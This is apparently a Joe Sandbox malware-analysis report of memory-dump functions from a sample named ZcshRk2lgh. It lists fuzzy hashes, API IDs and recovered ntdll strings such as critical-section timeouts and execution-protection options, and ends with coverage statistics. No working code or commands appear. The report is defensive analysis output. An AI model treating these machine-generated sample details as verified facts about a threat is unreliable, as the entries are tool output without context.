                                                                  • Instruction ID: 9086cfb29bf7d24498807f02c6aff23e0301fb2d67d2dacd5f122924e56f1e43
                                                                  • Opcode Fuzzy Hash: e63ea2cb5b7bc8ecbe151b74ca9609840e7e5d78661166019bcd5d3938a57f7e
                                                                  • Instruction Fuzzy Hash: 15F02B399122D18FE732C71CE044B9B77D49B20B30F8E586FC54587632C3B0E840C611
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 50f3e3dae6c7d336f7d3733c92d8b9e356ea02e21369bd6d7c0a41f95aebb762
                                                                  • Instruction ID: 36edf8b10a8284c90163904f2c1642049fb0dc843f75b16269a76f8312b26363
                                                                  • Opcode Fuzzy Hash: 50f3e3dae6c7d336f7d3733c92d8b9e356ea02e21369bd6d7c0a41f95aebb762
                                                                  • Instruction Fuzzy Hash: 6FF05C374196C286CF725B3CBC603E97F68B781014F0B1446E8B15F249C674848BD3A1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f6a4ba72ff1a8f5813d31f6485f82dc31c3267f5453af4c97465dddbae52ee24
                                                                  • Instruction ID: 7d63c1934e204c45742eb8bb5cd56cf1439c5f2eb535ef0d527245b4b53106e9
                                                                  • Opcode Fuzzy Hash: f6a4ba72ff1a8f5813d31f6485f82dc31c3267f5453af4c97465dddbae52ee24
                                                                  • Instruction Fuzzy Hash: 00F0E2715116519FEF22971CC1E8B52BBE4EB45BA0F1C942FE50E87632C370E882CA91
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                  • Instruction ID: d6615edf7d73137e874d2fd4ffd7e6d921fbb1ad4d575cab424584ad42f71998
                                                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                  • Instruction Fuzzy Hash: 63E092723406012BE7129F5A8CC4F477BAE9FA2B11F04047EB5045E2A2C9F29D0986A4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                  • Instruction ID: eff0a7d1122409372a0297fc746de5e56c498e5d8a01f15c00c8557057b22845
                                                                  • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                  • Instruction Fuzzy Hash: 1EF03072104204AFE3218F0AD985F56F7F8FB55364F45C42AE6099F561D37AED40CBA4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                  • Instruction ID: 2ca1ad1ffb1291a5c97438fb2413cdeaf78f60f53dbcb951f74c30970288fdca
                                                                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                  • Instruction Fuzzy Hash: CCF0E5392043459BEB16CF1AC050AD57FA8FB61390F02006AFD468B331D731E982CB51
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                  • Instruction ID: 06aadec3a1507a52481e9602731672e3185e5822bfcd0b502ed1050ff50b14a1
                                                                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                  • Instruction Fuzzy Hash: 3BE0D832344145ABDB311A598810B6777A5DBE07A0F1A042BE2408BB74DB70DC41C7E9
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                  • Instruction ID: 8deb57fa941c662244fc7be57d3625bb85bdaac8fd5efbce0824e7c0682635ef
                                                                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                  • Instruction Fuzzy Hash: 90E0D832640210BBDB2197598D11F9ABEBCEB60EA4F150055B600DB0A4D530DE00C690
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4d7611cc13fe834372494f1ce717b5d0d1fe76b215ed33b37e0daa05919e8387
                                                                  • Instruction ID: 2ae8154eed8f4c79ee6dae9c83e129f7d7e0ee9f9fbaaa29ddce347ac0496356
                                                                  • Opcode Fuzzy Hash: 4d7611cc13fe834372494f1ce717b5d0d1fe76b215ed33b37e0daa05919e8387
                                                                  • Instruction Fuzzy Hash: FB900225621401020545B558060450B0445E7E7351395C01AF24169A1CC731C9795321
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 97b1c5b5badbccc16869daf485deef3060d3343bcd4fb428bc15cf79a428b5ee
                                                                  • Instruction ID: 18ab69a286e6e9c73f32cc3a4bcdab617a77b3b06bd749ec611eb29f620226ea
                                                                  • Opcode Fuzzy Hash: 97b1c5b5badbccc16869daf485deef3060d3343bcd4fb428bc15cf79a428b5ee
                                                                  • Instruction Fuzzy Hash: F79002A1601541924900B2588404B0A4505D7F1201B55C01BE2054971CC735C9659235
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 624df96f6d7ea4683e3f8258ee32abcaaca097624cebb67768de13272e8c06ea
                                                                  • Instruction ID: e3cae2a34022dac99aec13a6a8b1c5f2d4407b7fd95d089af7bd54f078016b58
                                                                  • Opcode Fuzzy Hash: 624df96f6d7ea4683e3f8258ee32abcaaca097624cebb67768de13272e8c06ea
                                                                  • Instruction Fuzzy Hash: CF90022160544542D50075585408A060005D7E1205F55D016A20649A6DC735C965A231
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ff819baf21dbcae336d95aea68127adec0c1b68d0f1ee8f6319ab48717f6d06
                                                                  • Instruction ID: b019e7bbeea700e2fd293d431f63019900ac3b5c888a2fc882611058b433a4c7
                                                                  • Opcode Fuzzy Hash: 3ff819baf21dbcae336d95aea68127adec0c1b68d0f1ee8f6319ab48717f6d06
                                                                  • Instruction Fuzzy Hash: 7D90022961340102D5807158540860A0005D7E2202F95D41AA1015969CCB25C97D5321
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c8370c32c7bbef42fa30ac8045e40dba3e4f2004d5a421b4630e7efd191e3696
                                                                  • Instruction ID: 2fedd863e726b84bb90aaf7b823a8e6bce92badd3cba1915341e958e6271f755
                                                                  • Opcode Fuzzy Hash: c8370c32c7bbef42fa30ac8045e40dba3e4f2004d5a421b4630e7efd191e3696
                                                                  • Instruction Fuzzy Hash: 2590022170140103D540715854186064005E7F2301F55D016E1414965CDB25C96A5322
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 006f906cd350f316062bd00d2ae5ffce6da6a0d80c51b5e82c68979aaafbc7d9
                                                                  • Instruction ID: b750fc683ea15506b5c0259221360f54dadb712d54267ae98e6438ef3044f71d
                                                                  • Opcode Fuzzy Hash: 006f906cd350f316062bd00d2ae5ffce6da6a0d80c51b5e82c68979aaafbc7d9
                                                                  • Instruction Fuzzy Hash: 9C900221642442525945B15844045074006E7F1241795C017A2414D61CC736D96AD721
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bbe9e85b0b1b12c1f32cab62ce02ec0fd30e8e664dc2bbb7761b7c286800516b
                                                                  • Instruction ID: f37f0129a1f86244137ef496f8ee6a2e5a56866e962eda9d620b47e4bc596020
                                                                  • Opcode Fuzzy Hash: bbe9e85b0b1b12c1f32cab62ce02ec0fd30e8e664dc2bbb7761b7c286800516b
                                                                  • Instruction Fuzzy Hash: 2990023164140502D541715844046060009E7E1241F95C017A1424965EC765CB6AAB61
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a2d05ee279b6f55274526dd761851baf8eae9d107b60ec69aebe2dadfd34375c
                                                                  • Instruction ID: 34483269f2f4850d1c021f40a6a6c4913678e7e739b91221772f586118eb0580
                                                                  • Opcode Fuzzy Hash: a2d05ee279b6f55274526dd761851baf8eae9d107b60ec69aebe2dadfd34375c
                                                                  • Instruction Fuzzy Hash: C090023160140942D50071584404B460005D7F1301F55C01BA1124A65DC725C9657621
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a5e2840655e8a8ec9e570f2e8fe99f09c670c4d34aacb42b54ae9b409b57896e
                                                                  • Instruction ID: f10d0a75820046ef2a8a87fcc4f3dfac1e707a042ccc3158d116a9866d2b3485
                                                                  • Opcode Fuzzy Hash: a5e2840655e8a8ec9e570f2e8fe99f09c670c4d34aacb42b54ae9b409b57896e
                                                                  • Instruction Fuzzy Hash: 15900221A0540502D540715854187060015D7E1201F55D016A1024965DC769CB6967A1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f79657e6ad9303051d6dda32360014672fbd8c5f1b6a9bb778c1fcf1cf108edc
                                                                  • Instruction ID: 858c70968940c5a082e8c7e5a8a259dacfc9731fd90516822bac015436ce565a
                                                                  • Opcode Fuzzy Hash: f79657e6ad9303051d6dda32360014672fbd8c5f1b6a9bb778c1fcf1cf108edc
                                                                  • Instruction Fuzzy Hash: 6D90023160140503D500715855087070005D7E1201F55D416A1424969DD766C9656221
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ce875db22bd42b54bb20966d96ae5f4ac1a862e5ef054cac59c4e56449568448
                                                                  • Instruction ID: 91d26e08b8229b0af3409571d3593848a27d12c88e69271f55f6b0ce18614019
                                                                  • Opcode Fuzzy Hash: ce875db22bd42b54bb20966d96ae5f4ac1a862e5ef054cac59c4e56449568448
                                                                  • Instruction Fuzzy Hash: C190023160140502D500759854086460005D7F1301F55D016A6024966EC775C9A56231
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0c81f3b77e97a680efedc222121680bfae0c544d163eba484acb3daad54260ab
                                                                  • Instruction ID: 56091d6bc5a4352831860ce35ac859ed36b172e921a0b4d18da7dfa499269a1d
                                                                  • Opcode Fuzzy Hash: 0c81f3b77e97a680efedc222121680bfae0c544d163eba484acb3daad54260ab
                                                                  • Instruction Fuzzy Hash: FA90026161140142D504715844047060045D7F2201F55C017A3154965CC739CD755225
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2658ab0e24557fe5078414db6fa10135ee95184b401ada44c39ad7fc61f0da29
                                                                  • Instruction ID: 92b8cf2fee5e2b950cacb5c1b73ac0a3a656c13f726fcc23ec3d0f580d3df8ad
                                                                  • Opcode Fuzzy Hash: 2658ab0e24557fe5078414db6fa10135ee95184b401ada44c39ad7fc61f0da29
                                                                  • Instruction Fuzzy Hash: 9490026174140542D50071584414B060005D7F2301F55C01AE2064965DC729CD666226
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f09d485e932b6c9a1f2698a369102116881e9aaecea3ef8014146a5e082fa4da
                                                                  • Instruction ID: 7c3e3a49322521dffde133bdd93d4b77650462a59634525434db0b6315a756a9
                                                                  • Opcode Fuzzy Hash: f09d485e932b6c9a1f2698a369102116881e9aaecea3ef8014146a5e082fa4da
                                                                  • Instruction Fuzzy Hash: B0900221611C0142D60075684C14B070005D7E1303F55C11AA1154965CCB25C9755621
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 92defaeaea0e6a37853d4d6e9dfb8804eb82f44674c747b4cfd624cedb8136a7
                                                                  • Instruction ID: 5e06ece8d23c19596a5109cc903171f3068120dfe22b71d2f84aa328753eae93
                                                                  • Opcode Fuzzy Hash: 92defaeaea0e6a37853d4d6e9dfb8804eb82f44674c747b4cfd624cedb8136a7
                                                                  • Instruction Fuzzy Hash: 8090023160180502D5007158481470B0005D7E1302F55C016A2164966DC735C9656671
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d09cc07256fb581e30bc3c631f9ddbe2b69197fb3d6410dc6fe5b88bc958d34a
                                                                  • Instruction ID: 9765cd71cc380527d111be535b97dfaab2eb294f2206e1cb641e319fd6296faf
                                                                  • Opcode Fuzzy Hash: d09cc07256fb581e30bc3c631f9ddbe2b69197fb3d6410dc6fe5b88bc958d34a
                                                                  • Instruction Fuzzy Hash: 0D90023160180502D500715848087470005D7E1302F55C016A6164966EC775C9A56631
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 23746fa5b30addc43084dbbda9dbe3b888ec3794a450a8d98bdb7e7a4e8e69f3
                                                                  • Instruction ID: f5b2aa16701cdf6d123cfe45864ea440aa995eeee6b67256bec694fe2ce564d7
                                                                  • Opcode Fuzzy Hash: 23746fa5b30addc43084dbbda9dbe3b888ec3794a450a8d98bdb7e7a4e8e69f3
                                                                  • Instruction Fuzzy Hash: F9900221A01401424540716888449064005FBF2211755C126A1998961DC769C9795765
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f8799814d5c76ef06eb5f9a09e75e2fe1c43a7d99be191847c46bb7201e03403
                                                                  • Instruction ID: 6ae71c49923f2dbdc2d6528b21da8b6430732ce7291feec5c1d5cad6f646c18a
                                                                  • Opcode Fuzzy Hash: f8799814d5c76ef06eb5f9a09e75e2fe1c43a7d99be191847c46bb7201e03403
                                                                  • Instruction Fuzzy Hash: 3C90022170140502D502715844146060009D7E2345F95C017E2424966DC735CA67A232
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fd8646904c5fc72e8cd0ca812990138973243adedaa6c7fe1836d7f794605d4c
                                                                  • Instruction ID: 4f0970cb0017cb02dd4f30f4757287b513bd0a457e1b17c60955e124bd97882e
                                                                  • Opcode Fuzzy Hash: fd8646904c5fc72e8cd0ca812990138973243adedaa6c7fe1836d7f794605d4c
                                                                  • Instruction Fuzzy Hash: 8590026160180503D540755848046070005D7E1302F55C016A3064966ECB39CD656235
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 433c36e4753a2b469efc7f26a75b46966d7dd1ec0f43ca919286d18a510783aa
                                                                  • Instruction ID: 772c848872814c2f5ba8f9a40c10f95ea8f65f848a970f181c83776beff93138
                                                                  • Opcode Fuzzy Hash: 433c36e4753a2b469efc7f26a75b46966d7dd1ec0f43ca919286d18a510783aa
                                                                  • Instruction Fuzzy Hash: F2900221A0140602D50171584404616000AD7E1241F95C027A2024966ECB35CAA6A231
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  Strings
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01514787
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015146FC
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01514725
                                                                  • ExecuteOptions, xrefs: 015146A0
                                                                  • Execute=1, xrefs: 01514713
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01514655
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01514742
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$[$]:%u
                                                                  • API String ID: 48624451-2819853543
                                                                  Strings
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015102E7
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015102BD
                                                                  • RTL: Re-Waiting, xrefs: 0151031E
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  • API String ID: 0-2474120054
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 01517B8E
                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01517B7F
                                                                  • RTL: Re-Waiting, xrefs: 01517BAC
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 0-871070163
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0151728C
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 015172A3
                                                                  • RTL: Re-Waiting, xrefs: 015172C1
                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01517294
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 885266447-605551621
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$]:%u
                                                                  • API String ID: 48624451-3050659472
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-
                                                                  • API String ID: 1302938615-2137968064
                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $$@
                                                                  • API String ID: 0-1194432280

                                                                  Execution Graph

                                                                  Execution Coverage:2.6%
                                                                  Dynamic/Decrypted Code Coverage:4.3%
                                                                  Signature Coverage:1.6%
                                                                  Total number of Nodes:439
                                                                  Total number of Limit Nodes:70
